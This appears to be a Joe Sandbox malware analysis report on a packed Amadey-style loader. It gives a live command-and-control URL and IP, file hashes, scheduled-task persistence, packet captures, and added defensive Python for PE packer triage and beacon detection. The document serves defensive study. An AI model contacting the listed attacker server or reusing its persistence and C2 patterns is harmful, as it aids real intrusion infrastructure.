Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | 50% | ReversingLabs | Win32.Packed.Themida
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.43/Zu7JuNko/index.phpncodedH | 100% | Avira URL Cloud | malware
http://185.215.113.43/Zu7JuNko/index.php% | 100% | Avira URL Cloud | malware
http://185.215.113.43/8 | 100% | Avira URL Cloud | malware
http://185.215.113.43/Zu7JuNko/index.phpE | 100% | Avira URL Cloud | malware
http://185.215.113.43/Zu7JuNko/index.phpncodedo | 100% | Avira URL Cloud | malware
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.43/Zu7JuNko/index.php | false | none | high

Name | Source | Malicious | Antivirus Detection | Reputation
(The characters following index.php in the names below, such as 5, 4, ncodedH, %, appear to be bytes adjacent to the URL in the memory dump that string extraction carried along; the C2 path itself is /Zu7JuNko/index.php.)
http://185.215.113.43/Zu7JuNko/index.php5 | skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.php4 | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpncodedH | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpy | skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpZ | skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpX | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.php% | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpE | skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpded | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpd | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpncoded | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/8 | skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.php( | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phph | skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpL | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
http://185.215.113.43/Zu7JuNko/index.phpncodedo | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.43/Zu7JuNko/index.phpp | skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp | false | none | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.43 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561043
Start date and time: 2024-11-22 17:11:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:
• Successful, ratio: 25%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7412 because it is empty
• Execution Graph export aborted for target skotes.exe, PID 7656 because there are no executed functions
• Execution Graph export aborted for target skotes.exe, PID 7772 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
11:13:02 | API Interceptor | 2295293x Sleep call for process: skotes.exe modified
17:12:45 | Task Scheduler | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.43 | file.exe | malicious | LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | Amadey, Cryptbot | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.43/Zu7JuNko/index.php
  | Tygvfe21rw.exe | malicious | Amadey | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.43/Zu7JuNko/index.php
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC Stealer | 185.215.113.16
  | file.exe | malicious | LummaC | 185.215.113.16
  | file.exe | malicious | Stealc | 185.215.113.206
  | file.exe | malicious | LummaC | 185.215.113.16
  | file.exe | malicious | Stealc | 185.215.113.206
  | file.exe | malicious | LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer | 185.215.113.206
  | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
  | file.exe | malicious | Stealc | 185.215.113.206
  | file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
  | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
                                              No context
                                              No context
Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1922048
Entropy (8bit): 7.952724659681467
Encrypted: false
SSDEEP: 49152://TTxdTbrxgYihAr5xkWqG8E/N3SEry5RUuzen3lBsVL9t:/7TxZb0qrd9ucB8
MD5: 9DDBAC8AABA1C5BB2F9A22717A60A6BA
SHA1: 16712810FCF1BB9C7F1940AF8E2E59B92F4A7B65
SHA-256: EDEC375A0EF3CE9E3067AA661E9E32FEE7CBA13FF4F3C7AB69D6DB8D7B22B03D
SHA-512: 05D112DAD0D496F825ED88C18D7C196432994F5CCCA9F6F1E098D6376D56C1AA98D8C47E9542ACFE2A53672802E89E68257F607B843E4EBDBD38CD44F1DDBDDD
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
Reputation: low
Note: the MD5, SHA1, SHA-256 and SHA-512 values are identical to those of the submitted file.exe, so this dropped file is a byte-for-byte copy of the sample.
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................@L...........@..........................pL...........@.................................W...k.......H....................%L..............................%L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .@+.........................@...hockpqtz.@....1..6..................@...wxulotut.....0L.....................@....taggant.0...@L.."...2..............@...................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Note: the content is a Zone.Identifier alternate data stream. ZoneId=0 is the Local Machine zone, i.e. no Mark-of-the-Web; a file carrying it is treated as locally created rather than downloaded.
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 290
Entropy (8bit): 3.4550330736255077
Encrypted: false
SSDEEP: 6:HkZakxlVX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lBzlre1lEt0:EvN7BQ1CGAFBZgtVBzhqut0
MD5: 4DA68D6978AF41417F9EFDC8E58B4C76
SHA1: E158C107491DA13BB59F5B031919DFB7A59D0FE1
SHA-256: C7F807BCE7C14302B3E21306161CF314DD6D92F4383953ECDF41435C041BFCD9
SHA-512: EC13B9F3D821FA1DE4A861A3C739D66693257B19C5011C067F41567D04C25F8C04EA3CD8E321115E2455DFB598A95770A0771F3B71274D88C4D8BB2F42C483A1
Malicious: false
Reputation: low
Note: the preview holds the UTF-16 path C:\Users\hubert\AppData\Local\Temp\abc3bc1985\skotes.exe and the account HUBERT-PC\hubert, consistent with a Task Scheduler .job file for the skotes task listed in the timeline above.
Preview: .......yx..K...IW...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.952724659681467
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'922'048 bytes
MD5: 9ddbac8aaba1c5bb2f9a22717a60a6ba
SHA1: 16712810fcf1bb9c7f1940af8e2e59b92f4a7b65
SHA256: edec375a0ef3ce9e3067aa661e9e32fee7cba13ff4f3c7ab69d6db8d7b22b03d
SHA512: 05d112dad0d496f825ed88c18d7c196432994f5ccca9f6f1e098d6376d56c1aa98d8c47e9542acfe2a53672802e89e68257f607b843e4ebdbd38cd44f1ddbddd
SSDEEP: 49152://TTxdTbrxgYihAr5xkWqG8E/N3SEry5RUuzen3lBsVL9t:/7TxZb0qrd9ucB8
TLSH: B095331B4D03900EDE6E99F7B89691011BB57DE450370E2CF6126FAEB49BD437BC9046
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8c4000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                              Instruction
                                              jmp 00007FD0F8B2A1EAh
                                              rdmsr
                                              sbb eax, 00000000h
                                              add cl, ch
                                              add byte ptr [eax], ah
                                              add byte ptr [eax], al
                                              add byte ptr [edx+ecx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x448 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4c25e0 | 0x10 | hockpqtz
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x4c2590 | 0x18 | hockpqtz
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(non-printable name) | 0x1000 | 0x68000 | 0x2de00 | 47184781327aec90abd485996304b652 | False | 0.9983874744550408 | data | 7.988291086573797 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x448 | 0x600 | 23f61aeefa7c3d30c07a21aa8f45e969 | False | 0.3053385416666667 | data | 5.28505835027857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(non-printable name) | 0x6b000 | 0x2b4000 | 0x200 | f77c1e6cc74467e1867c1cbd3a1dbade | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hockpqtz | 0x31f000 | 0x1a4000 | 0x1a3600 | b5b3d3a509654cb859ca7cc2c0e03ae3 | False | 0.9949597149776453 | data | 7.955305476537546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wxulotut | 0x4c3000 | 0x1000 | 0x400 | 6f2f075218be009fe47629f92eac9e0e | False | 0.8330078125 | data | 6.337693953949785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4c4000 | 0x3000 | 0x2200 | c99628bca6e4e84e2b12c518feaa2d2a | False | 0.0625 | DOS executable (COM) | 0.7414169167298413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x69070 | 0x256 | ASCII text, with CRLF line terminators | - | - | 0.5100334448160535
RT_MANIFEST | 0x692c8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken | Map
English | United States
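The static data above is what the report's packer checks are keyed on: the entry point 0x8c4000 lies in .taggant rather than a standard code section, five sections are mapped writable and executable, two section names are not printable (and .idata carries a trailing space), the fourth section reserves 0x2b4000 bytes of virtual space behind only 0x200 bytes on disk, and the import table consists of a single kernel32.dll!lstrcpy. The following Python is an added example, not part of the Joe Sandbox report: a minimal PE header parser that reads the section table and entry point from an image and emits the same structural indicators. Because the sample's bytes are not on the page, the section layout is rebuilt as a header-only fixture from the table above (constructed; no code or data bytes), the two unnamed sections are given empty names, and the thresholds (virtual size at least 64 KiB and more than 16x the raw size) are assumptions.

```python
import struct
from collections import namedtuple

Section = namedtuple("Section", "name va vsize raw_size raw_ptr chars")

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}


def parse_pe(data):
    """Read image base, entry-point RVA and the section table from PE32/PE32+ headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:            # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:          # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections, off = [], opt + opt_size
    for _ in range(nsections):    # IMAGE_SECTION_HEADER is 40 bytes; Characteristics at +36
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(Section(raw_name.rstrip(b"\0").decode("latin-1"), va, vsize, raw_size, raw_ptr, chars))
        off += 40
    return image_base, entry_rva, sections


def section_of(sections, rva):
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw_size):
            return s
    return None


def is_clean_name(name):
    # Blank names, spaces and control bytes are what the report calls "special chars".
    return bool(name) and all(33 <= ord(c) <= 126 for c in name)


def packer_indicators(data):
    """Return the structural packer signs a triage script would flag for this image."""
    base, entry, secs = parse_pe(data)
    findings = []
    ep = section_of(secs, entry)
    if ep is None or ep.name not in STANDARD_CODE_SECTIONS:
        findings.append("entry point 0x%x lies in %r, not a standard code section"
                        % (base + entry, ep.name if ep else None))
    for s in secs:
        if s.chars & IMAGE_SCN_MEM_EXECUTE and s.chars & IMAGE_SCN_MEM_WRITE:
            findings.append("section %r is writable and executable" % s.name)
        if not is_clean_name(s.name):
            findings.append("section %r has a blank or non-printable name" % s.name)
        if s.vsize >= 0x10000 and s.vsize > 16 * s.raw_size:   # assumed thresholds
            findings.append("section %r reserves 0x%x bytes but holds 0x%x on disk (unpacking area)"
                            % (s.name, s.vsize, s.raw_size))
    return findings


def build_pe_header(entry_rva, image_base, sections):
    """Constructed fixture: a header-only PE32 image with the given section table, no code."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    opt_size = 0xE0                                          # standard PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, image_base)
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"), vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Section table copied from the report (name, VA, virtual size, raw size, characteristics).
# The two sections whose names are not printable are given empty names in this fixture.
REPORT_SECTIONS = [
    ("", 0x1000, 0x68000, 0x2de00, RWX),
    (".rsrc", 0x69000, 0x448, 0x600, RW),
    (".idata ", 0x6a000, 0x1000, 0x200, RW),
    ("", 0x6b000, 0x2b4000, 0x200, RWX),
    ("hockpqtz", 0x31f000, 0x1a4000, 0x1a3600, RWX),
    ("wxulotut", 0x4c3000, 0x1000, 0x400, RWX),
    (".taggant", 0x4c4000, 0x3000, 0x2200, RWX),
]
SAMPLE_IMAGE = build_pe_header(0x4c4000, 0x400000, REPORT_SECTIONS)

# Constructed benign control: an ordinary compiler layout with the entry point in .text.
BENIGN_IMAGE = build_pe_header(0x1000, 0x400000, [
    (".text", 0x1000, 0x1000, 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data", 0x2000, 0x100, 0x200, RW),
])

if __name__ == "__main__":
    for finding in packer_indicators(SAMPLE_IMAGE):
        print(finding)
```

Run against a real file, replace SAMPLE_IMAGE with the bytes of the executable; the parser only touches the headers, so it works on the full file as well as on the fixture. Section entropy, which the report also uses, is deliberately left out because the fixture carries no section data.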
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-22T17:13:25.472364+0100 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.8 | 49714 | 185.215.113.43 | 80 | TCP
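The Suricata rule above fires on the content of one request (the connection from port 49714, at 17:13:25). Independently of any signature, the TCP list that follows shows the host opening a fresh connection to 185.215.113.43:80 from an incrementing source port roughly every three seconds, which is the check-in cadence of the Amadey loader rather than user-driven browsing. The following Python is an added example, not part of the Joe Sandbox report: it parses rows in the list's format, takes the first packet of every client connection to the C2 as a check-in, and flags beaconing when the inter-connection intervals are regular. The sample rows are copied from the report's packet list (the connections on ports 49708 to 49714, plus one server reply to show that direction is ignored); the irregular negative control, the minimum of five connections and the coefficient-of-variation cut-off of 0.2 are assumptions.

```python
import re
import statistics
from collections import namedtuple
from datetime import datetime, timezone

Packet = namedtuple("Packet", "ts sport dport src dst")

# One row of the TCP list. The nine-digit fraction is captured separately because
# datetime.strptime accepts at most six digits.
_ROW = re.compile(
    r"^(?P<date>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+\s+"
    r"(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)$"
)

# Constructed sample: the first packet of each new client connection in the report,
# plus one server-to-client packet (80 -> 49708) that must not count as a check-in.
SAMPLE_PACKETS = """\
Nov 22, 2024 17:13:05.436768055 CET 49708 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:05.556304932 CET 80 49708 185.215.113.43 192.168.2.8
Nov 22, 2024 17:13:08.510174036 CET 49709 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:11.617872953 CET 49710 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:14.573564053 CET 49711 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:17.729924917 CET 49712 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:20.835383892 CET 49713 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:23.971095085 CET 49714 80 192.168.2.8 185.215.113.43
"""

# Constructed negative control: same hosts, human-like irregular timing.
IRREGULAR_PACKETS = """\
Nov 22, 2024 17:13:05.000000000 CET 50001 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:05.500000000 CET 50002 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:17.500000000 CET 50003 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:18.800000000 CET 50004 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:13:58.800000000 CET 50005 80 192.168.2.8 185.215.113.43
Nov 22, 2024 17:14:30.000000000 CET 50006 80 192.168.2.8 185.215.113.43
"""


def parse_packets(text):
    packets = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        base = datetime.strptime(m["date"], "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
        ts = base.timestamp() + int(m["frac"]) / 10 ** len(m["frac"])
        packets.append(Packet(ts, int(m["sport"]), int(m["dport"]), m["src"], m["dst"]))
    return packets


def connection_starts(packets, dst, dport=80):
    """Timestamp of the first packet of each client connection to dst:dport, in order."""
    first = {}
    for p in packets:
        if p.dst == dst and p.dport == dport:
            first.setdefault((p.src, p.sport), p.ts)
    return sorted(first.values())


def beacon_score(starts):
    """Mean interval between check-ins and its coefficient of variation (low = regular)."""
    gaps = [b - a for a, b in zip(starts, starts[1:])]
    if len(gaps) < 2:
        return {"connections": len(starts), "mean_interval": None, "cv": None}
    mean = statistics.mean(gaps)
    cv = statistics.stdev(gaps) / mean if mean else float("inf")
    return {"connections": len(starts), "mean_interval": mean, "cv": cv}


def is_beaconing(packets, dst, dport=80, min_conns=5, max_cv=0.2):
    score = beacon_score(connection_starts(packets, dst, dport))
    return (score["connections"] >= min_conns
            and score["cv"] is not None and score["cv"] <= max_cv)


if __name__ == "__main__":
    pk = parse_packets(SAMPLE_PACKETS)
    print(beacon_score(connection_starts(pk, "185.215.113.43")))
    print("beaconing:", is_beaconing(pk, "185.215.113.43"))
```

On the seven report connections the mean interval comes out at about 3.09 s with a coefficient of variation near 0.02, which is far tighter than the 0.2 cut-off; the control set, whose gaps range from half a second to forty seconds, is rejected on variance even though it has enough connections. On real captures, feed the function the full packet list rather than hand-picked rows: taking the first packet per (source, source port) pair does the de-duplication.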
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 17:13:05.436768055 CET | 49708 | 80 | 192.168.2.8 | 185.215.113.43
Nov 22, 2024 17:13:05.556304932 CET | 80 | 49708 | 185.215.113.43 | 192.168.2.8
Nov 22, 2024 17:13:05.556543112 CET | 49708 | 80 | 192.168.2.8 | 185.215.113.43
Nov 22, 2024 17:13:05.556982994 CET | 49708 | 80 | 192.168.2.8 | 185.215.113.43
Nov 22, 2024 17:13:05.676459074 CET | 80 | 49708 | 185.215.113.43 | 192.168.2.8
Nov 22, 2024 17:13:06.989620924 CET | 80 | 49708 | 185.215.113.43 | 192.168.2.8
